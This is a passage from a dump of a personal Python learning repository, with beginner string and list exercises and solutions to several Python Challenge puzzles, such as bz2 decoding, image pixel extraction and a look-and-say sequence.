= create_complex_list()\n for movie in newMovies:\n if isinstance(movie, str):\n print(movie)\n elif isinstance(movie, list):\n print_list(\"-->\", movie)"
},
{
"alpha_fraction": 0.6013533473014832,
"alphanum_fraction": 0.6701971292495728,
"avg_line_length": 35.956520080566406,
"blob_id": "167872e9536687f28b284738d244bab572f7ee0d",
"content_id": "0b0a961646e7532b7eaba5bb93eaa94a23a6018c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3399,
"license_type": "no_license",
"max_line_length": 231,
"num_lines": 92,
"path": "/PythonExercises/main.py",
"repo_name": "cansley/PythonProjects",
"src_encoding": "UTF-8",
"text": "__author__ = 'cxa70'\nimport time\nfrom pprint import pprint as pp\n\n# region Very Simple Exercises\n# from verysimpleexercises import *\n# print(max(12, 24))\n# print(maxofthree(3, 1, 7))\n# print(length(\"my test string\"))\n# print(length([12, 234, 6345, 234213, 23452345, 234, 123]))\n# print(length({(12, 45), (234,45), (1.234535, 2345)}))\n# print(isvowel(\"a\"))\n# print(isvowel(\"apple\"))\n# print(isvowel(234))\n# print(isvowel([1,23,4,56345]))\n# print(translate(\"this is fun\"))\n# print(sum([1,2,3,4]))\n# print(multiply([1,2,3,4]))\n# print(reverse(\"I am testing\"))\n# print(is_palindrome(\"patsy\"))\n# print(is_palindrome(\"bob\"))\n# print(is_palindrome(\"radar\"))\n# print(is_member(\"x\", \"test value\"))\n# print(is_member(\"x\", [12, 234, 3452346, \"123\", \"x\"]))\n# print(overlapping([1,2,3,4,5,6],[7,8,9,10,11,12]))\n# print(overlapping([1,2,3,4,5,6],[7,8,9,10,11,12,1]))\n# print(generate_n_chars('x', 10))\n# print(generate_n_chars('xz', 15))\n# historgram([3, 2, 6])\n# historgram([4,9,7])\n# print(max_in_list([123,4,56,2,3,4,5,6,23,23456,2356,346,3467,7,7,48,48,6,2345,2345,2345,23,45,7,47,3456,48,58,7,234,5,2347]))\n# print(map_lengths([\"test\",\"one\",\"fallow\"]))\n# print(find_longest_word([\"apple\",\"bottom\",\"jeans\",\"supercalifragilistic\"]))\n# print(filter_long_words(['foo', 'bang','crash'], 3))\n# print(is_palindrome_phrase(\"Was it a rat I saw?\"))\n# print(is_palindrome_phrase(\"Tango Charlie\"))\n# print(is_pangram(\"The quick brown fox jumps over the lazy dog\"))\n# print(is_pangram(\"The buick brown fox jumps over the lazy dog\"))\n# print(get_99btls_lyrics(99))\n# print(translate_swede(\"Merry Christmas\"))\n# pprint.pprint(char_freq(\"The buick brown fox jumps over the lazy dog\"))\n# print(caesar_cipher(\"Pnrfne pvcure? V zhpu cersre Pnrfne fnynq!\"))\n# print(correct(\"This is very funny and cool.Indeed!\"))\n# print(make_3sg_form(\"run\"))\n# print(make_3sg_form(\"carry\"))\n# print(make_3sg_form(\"coach\"))\n# print(make_ing_form(\"run\"))\n# print(make_ing_form(\"carry\"))\n# print(make_ing_form(\"be\"))\n# print(make_ing_form(\"see\"))\n# print(make_ing_form(\"travel\"))\n# print(make_ing_form(\"boogie\"))\n# endregion\n\n#region Higher Order Functions and list comprehensions\n# from highorderfunctions import *\n#\n# pp(max_in_list([1, 2342, 3, 4, 5, 6]))\n# pp(map_words(['test', 'other', 'words']))\n# pp(find_longest_word([\"this\", \"this is a test\", \"TheOther\"]))\n# pp(filter_long_words([\"test1\", \"test of another word\", \"the\"], 5))\n# pp(translate([\"merry\", 'christmas', 'and', 'happy', 'new', 'year']))\n#endregion\n\n#region Simple IO exercises\nfrom simpleIO import *\n\n# print_palindromes('testfile.txt')\n# pp(find_semordnilaps('testwordlist.txt'))\n# pp(\"Characters sorted by frequency:\")\n# pp(char_freq_table('testfile.txt', 1))\n# pp(\"Characters sorted by character:\")\n# pp(char_freq_table('testfile.txt', 0))\n# speak_ICAO(\"this is a test\", 0, 1)\n# pp(get_hapaxes(\"testfile.txt\"))\n# pp(number_lines(\"testfile.txt\", \"newfile.txt\"))\n# pp(get_avg_word_len(\"testwordlist.txt\"))\n# guess_number_game()\n# guess_word_game()\n# lingo()\n#endregion\n\n#region Harder Exercises\nfrom harder import *\n\n\n# text_splitter(\"splitText.txt\", \"Mr. Smith bought cheapsite.com for 1.5 million dollars, i.e. he paid a lot for it. Did he mind? Adam Jones Jr. thinks he didn't. In any case, this isn't true... 
Well, with a probability of .9 it isn't.\")\n# find_anagrams(\"unixdict.txt\")\n# bracket_string_analyser(bracket_string_generator(10)))\n# words_domino()\nfind_alternades()\n#endregion"
},
{
"alpha_fraction": 0.6293017268180847,
"alphanum_fraction": 0.6365129351615906,
"avg_line_length": 41.31721878051758,
"blob_id": "223635b02ecfd551f6de43dbf0dc265fd7212ccc",
"content_id": "61a7fd7dcccd96e0a3447701c9c66f1bbad5f37e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 14010,
"license_type": "no_license",
"max_line_length": 142,
"num_lines": 331,
"path": "/PythonExercises/verysimpleexercises.py",
"repo_name": "cansley/PythonProjects",
"src_encoding": "UTF-8",
"text": "# these exercises come from the web page: http://www.ling.gu.se/~lager/python_exercises.html\nimport re\n# 1 define a function max() that takes two numbers and returns the largest of them.\n# Use the if-then-else construct available in Python.\n# (Its true that Python has the max() function built in, but writing it yourself is nevertheless a good exercise.)\n\n\ndef max(num1, num2):\n if num1 > num2:\n return num1\n elif num2 > num1:\n return num2\n else:\n raise ValueError(\"Values cannot be equal.\")\n\n\n# Define a function max_of_three() that takes three numbers as arguments and returns the largest of them.\ndef maxofthree(num1, num2, num3):\n return max(max(num1, num2), num3)\n\n\n# Define a function that computes the length of a given list or string.\n# (It is true that Python has the len() function built in, but writing it yourself is nevertheless a good exercise.)\ndef length(obj):\n count = 0\n for x in obj:\n count += 1\n\n return count\n\n\n# Write a function that takes a character (i.e. a string of length 1) and returns True if it is a vowel, False otherwise.\ndef isvowel(value):\n vowels = [\"a\", \"e\", \"i\", \"o\", \"u\"]\n\n if str.isalpha(str(value)) and len(value) == 1 and str.lower(value) in vowels:\n return True\n else:\n return False\n\n\n# Write a function translate() that will translate a text into \"rövarspråket\" (Swedish for \"robber's language\").\n# That is, double every consonant and place an occurrence of \"o\" in between. For example, translate(\"this is fun\")\n# should return the string \"tothohisos isos fofunon\".\ndef translate(value):\n result = \"\"\n for c in value:\n if not isvowel(c) and not str.isspace(c):\n result += c + \"o\" + c\n else:\n result += c\n return result\n\n\n# Define a function sum() and a function multiply() that sums and multiplies (respectively) all the numbers\n# in a list of numbers.\n# For example, sum([1, 2, 3, 4]) should return 10, and multiply([1, 2, 3, 4]) should return 24.\ndef sum(numlist):\n value = 0\n for x in numlist:\n value += x\n return value\n\n\ndef multiply(numlist):\n value = 1\n for x in numlist:\n value *= x\n return value\n\n\n# Define a function reverse() that computes the reversal of a string.\n# For example, reverse(\"I am testing\") should return the string \"gnitset ma I\".\ndef reverse(string):\n value = \"\"\n for x in range(1, len(string) + 1):\n value += string[x * (-1)]\n return value\n\n\n# Define a function is_palindrome() that recognizes palindromes (i.e. words that look the same written backwards).\n# For example, is_palindrome(\"radar\") should return True.\ndef is_palindrome(string):\n return string == reverse(string)\n\n\n# Write a function is_member() that takes a value (i.e. a number, string, etc) x and a list of values a,\n# and returns True if x is a member of a, False otherwise. (Note that this is exactly what the in operator does,\n# but for the sake of the exercise you should pretend Python did not have this operator.)\ndef is_member(value, list):\n for x in list:\n if value == x:\n return True\n return False\n\n\n# Define a function overlapping() that takes two lists and returns True if they have at least one member in common,\n# False otherwise. 
You may use your is_member() function, or the in operator, but for the sake of the exercise,\n# you should (also) write it using two nested for-loops.\ndef overlapping(list1, list2):\n for x in list1:\n for y in list2:\n if x == y:\n return True\n return False\n\n\n# Define a function generate_n_chars() that takes an integer n and a character c and returns a string, n characters long,\n# consisting only of c:s. For example, generate_n_chars(5,\"x\") should return the string \"xxxxx\".\n# (Python is unusual in that you can actually write an expression 5 * \"x\" that will evaluate to \"xxxxx\".\n# For the sake of the exercise you should ignore that the problem can be solved in this manner.)\ndef generate_n_chars(char, count):\n result = \"\"\n for x in range(count):\n result += str(char)\n return result\n\n\n# Define a procedure histogram() that takes a list of integers and prints a histogram to the screen.\n# For example, histogram([4, 9, 7]) should print the following:\n# ****\n# *********\n# *******\ndef historgram(list1):\n for x in list1:\n print(generate_n_chars(\"*\", x))\n\n\n# The function max() from exercise 1) and the function max_of_three() from exercise 2) will only work for two and three\n# numbers, respectively. But suppose we have a much larger number of numbers, or suppose we cannot tell in advance how\n# many they are? Write a function max_in_list() that takes a list of numbers and returns the largest one.\ndef max_in_list(list):\n if len(list) > 2:\n val = None\n for x in range(len(list)):\n val = max_in_list([list[x], val])\n return val\n else:\n if list[1] is None or list[0] > list[1]:\n return list[0]\n else:\n return list[1]\n\n\n# Write a program that maps a list of words into a list of integers representing the lengths of the correponding words.\ndef map_lengths(wordlist):\n lengths = []\n for x in wordlist:\n lengths.append(len(x))\n return lengths\n\n\n# Write a function find_longest_word() that takes a list of words and returns the length of the longest one.\ndef find_longest_word(wordlist):\n lengths = map_lengths(wordlist)\n longestIdx = lengths.index(max_in_list(lengths))\n return wordlist[longestIdx]\n\n\n# Write a function filter_long_words() that takes a list of words and an integer n and returns the list of words that are longer than n.\ndef filter_long_words(wordlist, maxlength):\n return list(filter(lambda x: len(x) > maxlength, wordlist))\n\n\n# Write a version of a palindrome recognizer that also accepts phrase palindromes such as \"Go hang a salami I'm a\n# lasagna hog.\", \"Was it a rat I saw?\", \"Step on no pets\", \"Sit on a potato pan, Otis\", \"Lisa Bonet ate no basil\",\n# \"Satan, oscillate my metallic sonatas\", \"I roamed under it as a tired nude Maori\", \"Rise to vote sir\", or the\n# exclamation \"Dammit, I'm mad!\". Note that punctuation, capitalization, and spacing are usually ignored.\ndef is_palindrome_phrase(phrase):\n rx = re.compile(\"[a-z]\", re.IGNORECASE)\n r = ''.join(rx.findall(phrase)).lower()\n return is_palindrome(r)\n\n\n# A pangram is a sentence that contains all the letters of the English alphabet at least once, for example:\n# The quick brown fox jumps over the lazy dog. Your task here is to write a function to check a sentence to\n# see if it is a pangram or not.\ndef is_pangram(phrase):\n rx = re.compile(\"[a-z]\", re.IGNORECASE)\n letters = set(rx.findall(phrase.lower()))\n return len(letters) == 26\n\n\n# \"99 Bottles of Beer\" is a traditional song in the United States and Canada. 
It is popular to sing on long trips,\n# as it has a very repetitive format which is easy to memorize, and can take a long time to sing.\n# The song's simple lyrics are as follows:\n#\n# 99 bottles of beer on the wall, 99 bottles of beer.\n# Take one down, pass it around, 98 bottles of beer on the wall.\n#\n# The same verse is repeated, each time with one fewer bottle.\n# The song is completed when the singer or singers reach zero.\n#\n# Your task here is write a Python program capable of generating all the verses of the song.\ndef get_99btls_lyrics(starting_number):\n lyric_template = \"%d bottles of beer on the wall, %d bottles of beer.\\nTake one down, pass it around, %d bottles of beer on the wall.\\n\\n\"\n finalResult = \"\"\n for x in range(starting_number, 0, -1):\n finalResult += lyric_template % (x, x, x - 1)\n return finalResult\n\n\n# Represent a small bilingual lexicon as a Python dictionary in the following fashion\n# {\"merry\":\"god\", \"christmas\":\"jul\", \"and\":\"och\", \"happy\":gott\", \"new\":\"nytt\", \"year\":\"år\"}\n# and use it to translate your Christmas cards from English into Swedish.\n# That is, write a function translate() that takes a list of English words and returns a list of Swedish words.\ndef translate_swede(phrase):\n swede_dict = {\"merry\": \"god\", \"christmas\": \"jul\", \"and\": \"och\", \"happy\": \"gott\", \"new\": \"nytt\", \"year\": \"år\"}\n response = \"\"\n for x in str(phrase).split(\" \"):\n response += swede_dict[x.lower()] + \" \"\n return response\n\n\n# Write a function char_freq() that takes a string and builds a frequency listing of the characters contained in it.\n# Represent the frequency listing as a Python dictionary.\n# Try it with something like char_freq(\"abbabcbdbabdbdbabababcbcbab\").\ndef char_freq(phrase):\n freq_dict = {}\n for x in phrase:\n if x not in freq_dict.keys():\n freq_dict[x] = 1\n else:\n freq_dict[x] += 1\n return freq_dict\n\n\n# In cryptography, a Caesar cipher is a very simple encryption techniques in which each letter in the plain text is\n# replaced by a letter some fixed number of positions down the alphabet. For example, with a shift of 3,\n# A would be replaced by D, B would become E, and so on. The method is named after Julius Caesar,\n# who used it to communicate with his generals. ROT-13 (\"rotate by 13 places\") is a widely used example of a Caesar\n# cipher where the shift is 13. In Python, the key for ROT-13 may be represented by means of the following dictionary:\n#\n# key = {'a':'n', 'b':'o', 'c':'p', 'd':'q', 'e':'r', 'f':'s', 'g':'t', 'h':'u',\n# 'i':'v', 'j':'w', 'k':'x', 'l':'y', 'm':'z', 'n':'a', 'o':'b', 'p':'c',\n# 'q':'d', 'r':'e', 's':'f', 't':'g', 'u':'h', 'v':'i', 'w':'j', 'x':'k',\n# 'y':'l', 'z':'m', 'A':'N', 'B':'O', 'C':'P', 'D':'Q', 'E':'R', 'F':'S',\n# 'G':'T', 'H':'U', 'I':'V', 'J':'W', 'K':'X', 'L':'Y', 'M':'Z', 'N':'A',\n# 'O':'B', 'P':'C', 'Q':'D', 'R':'E', 'S':'F', 'T':'G', 'U':'H', 'V':'I',\n# 'W':'J', 'X':'K', 'Y':'L', 'Z':'M'}\n# Your task in this exercise is to implement an encoder/decoder of ROT-13. Once you're done, you will be able to read\n# the following secret message:\n#\n# Pnrfne pvcure? 
V zhpu cersre Pnrfne fnynq!\n# Note that since English has 26 characters, your ROT-13 program will be able to both encode and decode texts written\n# in English.\ndef caesar_cipher(phrase):\n key = {'a': 'n', 'b': 'o', 'c': 'p', 'd': 'q', 'e': 'r', 'f': 's', 'g': 't', 'h': 'u',\n 'i': 'v', 'j': 'w', 'k': 'x', 'l': 'y', 'm': 'z', 'n': 'a', 'o': 'b', 'p': 'c',\n 'q': 'd', 'r': 'e', 's': 'f', 't': 'g', 'u': 'h', 'v': 'i', 'w': 'j', 'x': 'k',\n 'y': 'l', 'z': 'm', 'A': 'N', 'B': 'O', 'C': 'P', 'D': 'Q', 'E': 'R', 'F': 'S',\n 'G': 'T', 'H': 'U', 'I': 'V', 'J': 'W', 'K': 'X', 'L': 'Y', 'M': 'Z', 'N': 'A',\n 'O': 'B', 'P': 'C', 'Q': 'D', 'R': 'E', 'S': 'F', 'T': 'G', 'U': 'H', 'V': 'I',\n 'W': 'J', 'X': 'K', 'Y': 'L', 'Z': 'M'}\n result = \"\"\n for x in phrase:\n if x in key.keys():\n result += key[x]\n else:\n result += x\n return result\n\n\n# Define a simple \"spelling correction\" function correct() that takes a string and sees to it that 1) two or more\n# occurrences of the space character is compressed into one, and 2) inserts an extra space after a period if the\n# period is directly followed by a letter. E.g. correct(\"This is very funny and cool.Indeed!\") should return\n# \"This is very funny and cool. Indeed!\" Tip: Use regular expressions!\ndef correct(phrase):\n multispace_regex = re.compile(\"\\s{2,}\").findall(phrase)\n nospace_regex = re.compile(\"(\\w.*)([.])(\\w.*)\")\n for x in multispace_regex:\n phrase = phrase.replace(x, ' ')\n\n r = nospace_regex.split(phrase)\n phrase = \"\"\n for x in r:\n if x == \".\":\n phrase += x + \" \"\n else:\n phrase += x\n return phrase\n\n# The third person singular verb form in English is distinguished by the suffix -s,\n# which is added to the stem of the infinitive form: run -> runs. A simple set of rules can be given as follows:\n#\n# If the verb ends in y, remove it and add ies\n# If the verb ends in o, ch, s, sh, x or z, add es\n# By default just add s\n#\n# Your task in this exercise is to define a function make_3sg_form() which given a verb in infinitive form returns\n# its third person singular form. Test your function with words like try, brush, run and fix. Note however that the\n# rules must be regarded as heuristic, in the sense that you must not expect them to work for all cases.\n# Tip: Check out the string method endswith().\ndef make_3sg_form(verb):\n other_ends = [\"o\", \"ch\", \"s\", \"sh\", \"x\", \"z\"]\n if str(verb).endswith(\"y\"):\n verb = verb[0: -1] + \"ies\"\n return verb\n elif list((True for x in other_ends if verb.endswith(x))):\n verb = list((verb + \"es\" for x in other_ends if verb.endswith(x)))[0]\n return verb\n else:\n verb += \"s\"\n return verb\n\n\n# In English, the present participle is formed by adding the suffix -ing to the infinite form: go -> going.\n# A simple set of heuristic rules can be given as follows:\n#\n#If the verb ends in e, drop the e and add ing (if not exception: be, see, flee, knee, etc.)\n#If the verb ends in ie, change ie to y and add ing\n#For words consisting of consonant-vowel-consonant, double the final letter before adding ing\n#By default just add ing\n#\n#Your task in this exercise is to define a function make_ing_form() which given a verb in infinitive form returns\n# its present participle form. Test your function with words such as lie, see, move and hug. 
However,\n# you must not expect such simple rules to work for all cases.\ndef make_ing_form(verb):\n cvc_regex = re.compile(\"[^aeiou][aeiou][^aeiou]\", re.IGNORECASE)\n if str(verb).endswith(\"ie\"):\n verb = verb[0:-2] + 'ying'\n elif str(verb).endswith(\"e\"):\n if str(verb).endswith(\"ee\") or len(verb) < 3:\n verb += \"ing\"\n else:\n verb = verb[:-1] + \"ing\"\n elif cvc_regex.search(verb[-3:]):\n verb = verb + verb[-1] + \"ing\"\n else:\n verb += \"ing\"\n return verb"
},
{
"alpha_fraction": 0.5291005373001099,
"alphanum_fraction": 0.7063491940498352,
"avg_line_length": 28.153846740722656,
"blob_id": "f28b5392b256c7a1b27f93b206530b0915d90c4c",
"content_id": "3ca05ed96e1ddfa92d04ceed8be629321ded4f86",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 378,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 13,
"path": "/PythonChallenges/8.py",
"repo_name": "cansley/PythonProjects",
"src_encoding": "UTF-8",
"text": "__author__ = 'cxa70'\n\nimport bz2\n\n# bzip extract these values\nusername = b'BZh91AY&SYA\\xaf\\x82\\r\\x00\\x00\\x01\\x01\\x80\\x02\\xc0\\x02\\x00 \\x00!\\x9ah3M\\x07<]\\xc9\\x14\\xe1BA\\x06\\xbe\\x084'\npassword = b'BZh91AY&SY\\x94$|\\x0e\\x00\\x00\\x00\\x81\\x00\\x03$ \\x00!\\x9ah3M\\x13<]\\xc9\\x14\\xe1BBP\\x91\\xf08'\n\nu = bz2.decompress(username).decode('utf-8')\np = bz2.decompress(password).decode('utf-8')\n\nprint(u)\nprint(p)"
},
{
"alpha_fraction": 0.5787278413772583,
"alphanum_fraction": 0.6246089935302734,
"avg_line_length": 24.210525512695312,
"blob_id": "e9bfa7958aebbe7dd95d047f9b17301846e6b816",
"content_id": "9828c1cf10d7c51fcf35c2103f9c81a5c1225c24",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 959,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 38,
"path": "/PythonChallenges/10.py",
"repo_name": "cansley/PythonProjects",
"src_encoding": "UTF-8",
"text": "__author__ = 'cxa70'\n\nimport string\n\na = [1, 11, 21, 1211, 111221, ] # Dafuq does this even mean?\n# after the first value, the number represents a description of the value before it.\n# example: 1 = one 1 or 11. 11 = two 1 or 21, 21 = one 2 one 1 or 1211, etc.\ndef transformCharacterCount(char, count):\n assert isinstance(char, str)\n return str(count)+str(char)\n\n\ntestValue = \"1\"\nmasterList = [testValue, ]\n\nrunCount = 0\n\nwhile runCount <= 30:\n evalChar = \"\"\n outputValue = \"\"\n charCount = 0\n for char in testValue:\n if evalChar == \"\":\n evalChar = char\n\n if evalChar == char:\n charCount += 1\n else:\n outputValue += transformCharacterCount(evalChar, charCount)\n evalChar = char\n charCount = 1\n\n outputValue += transformCharacterCount(evalChar, charCount)\n testValue = outputValue\n masterList.append(testValue)\n runCount += 1\n\nprint(len(masterList[30]))\n\n"
},
{
"alpha_fraction": 0.6451612710952759,
"alphanum_fraction": 0.6666666865348816,
"avg_line_length": 17.799999237060547,
"blob_id": "f5338f0cc73d68826dd4c6a759e45895b2c8305b",
"content_id": "86637a16af3e1efc1908b4a5ec96ff9951e36dfd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 93,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 5,
"path": "/PythonChallenges/13.py",
"repo_name": "cansley/PythonProjects",
"src_encoding": "UTF-8",
"text": "__author__ = 'cxa70'\n\n\n#fuck this. something to do with XML-RPC service....\n#answer is: italy"
},
{
"alpha_fraction": 0.5816733241081238,
"alphanum_fraction": 0.5936254858970642,
"avg_line_length": 19.91666603088379,
"blob_id": "252968e0844d6ab9d921d081c656da58634bdaf1",
"content_id": "88dd321082ce3ab618e6aae63f58cbf0d727c602",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1004,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 48,
"path": "/HeadFirstPython/main.py",
"repo_name": "cansley/PythonProjects",
"src_encoding": "UTF-8",
"text": "__author__ = 'cxa70'\n\nimport Ch1\nimport xml.etree.cElementTree as et\nimport sqlite3 as sql\nimport XmlNode\n\n\ndef showElements(element, indent, is_root):\n sz = len(element)\n ind = indent\n if is_root:\n ind = 0\n if sz > 0:\n print(\" \"*ind + \"Name: \" + element.tag)\n for ele in element:\n showElements(ele, indent*2, False)\n else:\n print(\" \"*indent + element.tag + \": \" + element.text)\n\n\ndef print_sections(section, indent):\n idt = indent\n if section.IsRoot:\n idt = 0\n\n print(\" \"*idt + section.Name + \"(\" + section.Value + \")\")\n\n if section.has_values():\n for val in section.Values:\n print(\" \"*indent*2 + val.Name + \": \" + val.Value)\n\n if section.has_sections():\n for sec in section.Sections:\n print_sections(sec, indent*2)\n\n\n\n\n\nxdoc = et.parse('RRV-CINCToDSHRequestSample1.xml')\nroot = xdoc.getroot()\n\ndoc = XmlNode.Section()\ndoc.IsRoot = True\ndoc.build_from_etree(root)\n\nprint_sections(doc, 2)\n"
},
{
"alpha_fraction": 0.5855130553245544,
"alphanum_fraction": 0.6056337952613831,
"avg_line_length": 18.115385055541992,
"blob_id": "a863f2ca265cc73e5fcc02cafbd89d4972ebcbde",
"content_id": "631538466b46aa4ea4e80cd4900af54721d210b7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 497,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 26,
"path": "/PythonChallenges/7.py",
"repo_name": "cansley/PythonProjects",
"src_encoding": "UTF-8",
"text": "__author__ = 'cxa70'\n\nfrom PyQt4.QtCore import *\nfrom PyQt4.QtGui import *\nimport ast\n\napp = QCoreApplication([])\nimage = QImage(\"oxygen.png\")\nimage.size()\nsz = image.size()\ny = sz.height()/2\nval = ''\n\nfor x in range(0, sz.width(), 7):\n px = QColor(image.pixel(x, y))\n val += chr(px.getRgb()[0])\n\nstart_idx = val.find('[')\nend_idx = val.find(']')\nstub = val[start_idx:end_idx+1]\nlvl = ast.literal_eval(stub)\nslvl = \"\"\nfor x in lvl:\n slvl += chr(x)\n\nprint(val[:start_idx-1] + ': ' + slvl)\n"
},
{
"alpha_fraction": 0.633367657661438,
"alphanum_fraction": 0.6704428195953369,
"avg_line_length": 30.354839324951172,
"blob_id": "fb25fc950fb7d222fbb42a64263961ec0fdfdb85",
"content_id": "8933a766e246b884cb7c520ddbb8597afef23931",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 971,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 31,
"path": "/PythonChallenges/15.py",
"repo_name": "cansley/PythonProjects",
"src_encoding": "UTF-8",
"text": "__author__ = 'cxa70'\n# page displays title of \"whom?\"\n# page shows calendar with Jan-26th circled\n# page shows calendar with 1**6 in the year\n# page source has these hints:\n# he aint the youngest, he's the second\n# todo: buy flowers for tomorrow\n#\n# target date is jan-27th, but what year?\n# Feb on calendar shows 29 days, so its a leap year.\n# Jan 1 is a Thursday...\n\nimport datetime\n\nyear = 2010\nrndDate = datetime.date(year, 3, 1) # lets start with march first...\nrndDate += datetime.timedelta(days=-1)\nwhile rndDate.day != 29:\n year += -1\n rndDate = datetime.date(year, 3, 1) + datetime.timedelta(days=-1)\n\nstartYear = rndDate.year\n\nfor x in range(startYear, 1, -4):\n theDate = datetime.date(x, 1, 1)\n theYear = list(str(theDate.year))\n if theDate.weekday() == 3 and theYear[0] == '1' and theYear[-1] == '6':\n newDate = datetime.date(theDate.year, 1, 27)\n print(newDate)\n\n# from the dates produced, find the birtday (hint: its mozart!)"
},
{
"alpha_fraction": 0.5090751647949219,
"alphanum_fraction": 0.5471045970916748,
"avg_line_length": 37.599998474121094,
"blob_id": "450295e069c345fa8b59f9b8305b04a250fe523c",
"content_id": "f7bbc300d8fc0f046d1fbc5888a871f00678b38f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1157,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 30,
"path": "/PythonChallenges/11.py",
"repo_name": "cansley/PythonProjects",
"src_encoding": "UTF-8",
"text": "__author__ = 'cxa70'\n\nfrom PyQt4.QtCore import *\nfrom PyQt4.QtGui import *\n\n# download the image from: http://www.pythonchallenge.com/pc/return/cave.jpg\napp = QCoreApplication([])\noriginal = QImage(\"cave.jpg\")\no_width = original.size().width()\no_height = original.size().height()\nodd = QImage(o_width/2, o_height/2, original.format())\neven = QImage(o_width/2, o_height/2, original.format())\n\nfor x in range(o_width):\n for y in range(o_height):\n if x % 2 == 0 and y % 2 == 0:\n even.setPixel(x/2, y/2, original.pixel(x, y))\n #even.putpixel((x / 2, y / 2), image.getpixel((x, y)))\n elif x % 2 == 0 and y % 2 == 1:\n odd.setPixel(x/2, (y-1)/2, original.pixel(x, y))\n #odd.putpixel((x / 2, (y - 1) / 2), image.getpixel((x, y)))\n elif x % 2 == 1 and y % 2 == 0:\n even.setPixel((x-1)/2, y/2, original.pixel(x, y))\n #even.putpixel(((x - 1) / 2, y / 2), image.getpixel((x, y)))\n else:\n odd.setPixel((x-1)/2, (y-1)/2, original.pixel(x, y))\n #odd.putpixel(((x - 1) / 2, (y - 1) / 2), image.getpixel((x, y)))\n\neven.save(\"even.jpg\")\nodd.save(\"odd.jpg\")"
},
{
"alpha_fraction": 0.45910781621932983,
"alphanum_fraction": 0.4758364260196686,
"avg_line_length": 18.962963104248047,
"blob_id": "cc6c8a1124494767396288128d8fbba050cfb003",
"content_id": "74415bbcbd8b0c8e87066178f59bfcfdb5bfc3f7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 538,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 27,
"path": "/MyFirstPython/test.py",
"repo_name": "cansley/PythonProjects",
"src_encoding": "UTF-8",
"text": "__author__ = 'cxa70'\n\nimport string\n\ngarbledText = \"map\"\ncleanedText = \"\"\ncharacterCode = {\"k\": \"m\",\n \"o\": \"q\",\n \"e\": \"g\",\n \"g\": \"i\"}\n\nfor char in garbledText:\n if string.ascii_lowercase.__contains__(char):\n idx = string.ascii_lowercase.index(char)\n if idx == 24:\n idx = 0\n elif idx == 25:\n idx = 1\n else:\n idx += 2\n\n cleanedText += string.ascii_lowercase[idx]\n else:\n cleanedText += char\n\n\nprint(cleanedText)"
},
{
"alpha_fraction": 0.6504064798355103,
"alphanum_fraction": 0.7154471278190613,
"avg_line_length": 19.66666603088379,
"blob_id": "5117abb352d01fcad8d42b38ff5a53d9c940d5f0",
"content_id": "086f8e7a323741e9a7d295aa64a9a00a5ea4d012",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 123,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 6,
"path": "/PythonChallenges/0.py",
"repo_name": "cansley/PythonProjects",
"src_encoding": "UTF-8",
"text": "__author__ = 'cxa70'\n#calculate 2^38 and use the result in the url to move to the next challenge\n\nimport math\n\nprint(2**38)"
},
{
"alpha_fraction": 0.6317829489707947,
"alphanum_fraction": 0.6472868323326111,
"avg_line_length": 17.5,
"blob_id": "08ab6be88c228b6a2aa4e86936db879487c67844",
"content_id": "f66f744b82888cc0b72a291b7d7303adf85c2e20",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 258,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 14,
"path": "/PythonChallenges/5.py",
"repo_name": "cansley/PythonProjects",
"src_encoding": "UTF-8",
"text": "__author__ = 'cxa70'\n\nimport pickle\npk = pickle.Unpickler(open(\"banner.p\", \"rb\"))\n\nwtfAmI = pk.load()\nstringThing = \"\"\nfor thing in wtfAmI:\n for subThing in thing:\n stringThing += subThing[0]*subThing[1]\n\n stringThing += \"\\n\"\n\nprint(stringThing)"
},
{
"alpha_fraction": 0.7666666507720947,
"alphanum_fraction": 0.7666666507720947,
"avg_line_length": 30,
"blob_id": "cf6f48deae00a6f64c053af6d999d620513c7547",
"content_id": "e0015a7e5950ef74319fdbf8b67c1148b63b0c60",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 30,
"license_type": "no_license",
"max_line_length": 30,
"num_lines": 1,
"path": "/HeadFirstPython/readme.txt",
"repo_name": "cansley/PythonProjects",
"src_encoding": "UTF-8",
"text": "Nothing of note here...really."
},
{
"alpha_fraction": 0.4883720874786377,
"alphanum_fraction": 0.49435216188430786,
"avg_line_length": 24.100000381469727,
"blob_id": "ee9a169f2692fea491057bec565877c5b55ca2e8",
"content_id": "86e5471ed15a195d49b19942f779a8a854e0b3d4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1505,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 60,
"path": "/HeadFirstPython/XmlNode.py",
"repo_name": "cansley/PythonProjects",
"src_encoding": "UTF-8",
